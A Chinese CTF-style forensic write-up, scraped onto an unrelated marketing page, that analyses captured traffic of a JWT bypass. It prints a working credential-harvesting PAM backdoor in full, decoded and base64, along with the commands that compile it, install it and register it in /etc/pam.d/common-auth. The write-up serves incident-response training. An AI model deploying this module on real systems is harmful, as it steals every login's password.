当前位置: 首页 > news >正文

市场营销网站互联网推广是什么意思

市场营销网站,互联网推广是什么意思,51网站一起做网店,模板建站和自助建站目录 签到1、攻击者正在进行的可能是什么协议的网络攻击 jwt1、该网站使用了______认证方式。前置知识#xff1a;解#xff1a; 2、黑客绕过验证使用的jwt中#xff0c;id和username是3、黑客获取webshell之后#xff0c;权限是什么4、黑客上传的恶意文件文件名是5、黑客在… 目录 签到1、攻击者正在进行的可能是什么协议的网络攻击 jwt1、该网站使用了______认证方式。前置知识解 2、黑客绕过验证使用的jwt中id和username是3、黑客获取webshell之后权限是什么4、黑客上传的恶意文件文件名是5、黑客在服务器上编译的恶意so文件文件名是什么6、黑客在服务器上修改了一个配置文件文件的绝对路径为 签到 1、攻击者正在进行的可能是什么协议的网络攻击 统计 -- 协议分级 主要是TCP协议且应用层协议主要是HTTP HTTP jwt 昨天单位流量系统捕获了黑客攻击流量请您分析流量后进行回答 1、该网站使用了______认证方式。 前置知识 网站使用的认证方式主要有 Session机制JWTOAuth2CookieHTTP Basic AuthOpenID Connect双因素认证 记得各种认证方式的主要特征 JWT头部、载荷和签名三段数据以.分隔通过base64进行加密 解 查看token的信息明显的jwt认证方式 还可以解码进行验证直接能识别到用JWT进行解码了~~~ 用base64解头部也一样 JWT 2、黑客绕过验证使用的jwt中id和username是 追踪HTTP流 既然问的是id和username那么就要找whoami这个命令并且返回200码 在第3个流有所发现 解码是 之后的流中显示的信息是没有成功攻击继续往下分析 在第10个流时再次发现往后的流就是在进行攻击 把第二段载荷解码即可 对往后的流进行分析 # eq 11 echo%20MTIz|base64%20-d # 输出MTIz用base64解码之后的结果 # 返回 123#eq 12 echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d输出base64解码后的内容 解码后是一段C代码 #include security/pam_appl.h #include security/pam_modules.h #include unistd.h size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp) { return size * nmemb; }void saveMessage(char (*message)[]) { FILE *fp NULL; fp fopen(/tmp/.looter, a); fputs(*message, fp); fclose(fp); }PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) { return PAM_SUCCESS; }PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) { return PAM_SUCCESS; }PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) { int retval; const char* username; const char* password; char message[1024]; retval pam_get_user(pamh, username, Username: ); pam_get_item(pamh, PAM_AUTHTOK, (void *) password); if (retval ! PAM_SUCCESS) { return retval; }snprintf(message,2048,Username %s\nPassword: %s\n,username,password); saveMessage(message); return PAM_SUCCESS; }这段代码是一个PAM模块的示例用于在Linux系统中进行身份验证并将用户名和密码保存到文件中。 #eq 13 echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d%20/tmp/1.c输出的结果定向到/tmp/1.c文件中 #eq 14 ls%20/tmp查看/tmp文件夹 #eq 15 cat /tmp/1.c查看1.c的文件内容 #eq 16 echo%20Q0ZMQUdTICs9IC1XZXJyb3IgLVdhbGwKCmxvb3Rlci5zbzogbG9vdGVyLmMKCWdjYyAkKENGTEFHUykgLWZQSUMgLXNoYXJlZCAtWGxpbmtlciAteCAtbyAkQCAkPCAtbGN1cmw|base64%20-d%20/tmp/MakefileCFLAGS -Werror -Walllooter.so: looter.cgcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $ $ -lcurl写入/tmp/Makefile文件中 用于编译一个名为looter.so的共享库。其中CFLAGS变量包含了一些编译选项如-Werror和-Wall分别表示将所有警告视为错误和开启所有警告。接下来的规则定义了如何从looter.c源文件生成looter.so共享库。 #eq 17 ls%20/tmp查看tmp目录下的文件 #eq 18 cd%20/tmp;make切换到tmp目录下后执行make命令进行自动编译 #eq 19 mv%20/tmp/1.c%20/tmp/looter.c重命名1.c为looter.c #eq 20 cd%20/tmp;make在tmp目录下执行make命令 #eq 21 ls%20/tmp查看tmp目录下的文件 多了looter.so文件进行了编译 #eq 22 cp%20/tmp/looter.so%20/lib/x86_64-linux-gnu/security/将looter.so复制到/lib/x86_64-linux-gnu/security/路径下 #eq 23 ls%20/lib/x86_64-linux-gnu/security/查看该路径目录文件 #eq 24 echo%20auth%20optional%20looter.so输出字符串auth optional looter.so #eq 25 echo%20\nauth%20optional%20looter.so输出字符串回车 auth optional looter.so #eq 26 echo%20auth%20optional%20looter.so/etc/pam.d/common-auth将这串字符串auth optional looter.so添加到/etc/pam.d/common-auth内容的后面 #eq 27 cat%20/etc/pam.d/common-auth查看common-auth的文件内容 #eq 28 service%20ssh%20restart重启ssh服务 #eq 29 whoami当前用户 #eq 30 ls%20-al%20/tmp查看详细信息 #eq 31 cat%20/tmp/.looter查看.looter文件信息 10087 admin 3、黑客获取webshell之后权限是什么 查看whoami返回的值 root 4、黑客上传的恶意文件文件名是 分析第13流可以知道是1.c 1.c 5、黑客在服务器上编译的恶意so文件文件名是什么 分析第16-21流得知编译后的文件名是looter.so looter.so 6、黑客在服务器上修改了一个配置文件文件的绝对路径为 分析第26流修改的配置文件路径为/etc/pam.d/common-auth /etc/pam.d/common-auth
http://www.pierceye.com/news/149592/

相关文章:

  • 做招聘的h5用哪个网站企业网站需要多大空间
  • 织梦 公司网站模板html5网站开发的源码
  • 晋江网站建设公司电脑培训网
  • 电子商务网站开发的题网站关键词排名怎么提升
  • 在百度网站备案查询上显示未备案是什么意思wordpress资源分享主题
  • 夏县做网站郑州做商城网站
  • 网站首页推荐网络服务提供者发现用户利用其网络服务对未成年
  • 中外网站建设区别微信软文是什么意思
  • 苏州网站建设极简幕枫卫浴网站建设
  • 优秀企业网站欣赏网站的备案怎么处理
  • 怎样做古玩网站毕业设计开题报告网站开发
  • 西安网站 建设app注册推广
  • 丹徒网站建设公司代理公司注册价格
  • 网站建站建设网站中国商标商标查询网
  • 机械加工网站平台南京app制作开发公司
  • 用vs2008做网站教程seo推广网址
  • 正规制作网站公司哪家好视觉传达设计专业作品集
  • 做网站多少钱特惠西宁君博s网站网站建设多少钱
  • 建筑模版东莞网站建设技术支持手机网站开发学习
  • 专业网站建设效果显著做设计找参考的设计网站有那些
  • 最新网站建设技术2022年新闻摘抄简短
  • 手机网站总是自动跳转最吃香的男生十大手艺
  • 免费网站推广软件哪个好企业vi设计公司价格
  • 自助建网站不需要域名番禺网站优化平台
  • 一般建设网站的常见问题国家企业信用信息公示官网
  • 韩国美容网站 模板互联网大赛官网入口
  • 太原网站开发哪家好wordpress怎么贴代码
  • 深圳网站设计与制作网站建设公司海南
  • 做网站需要什么cailiao网站项目申报书建设规模
  • wordpress手机网站模板wordpress分类设置seo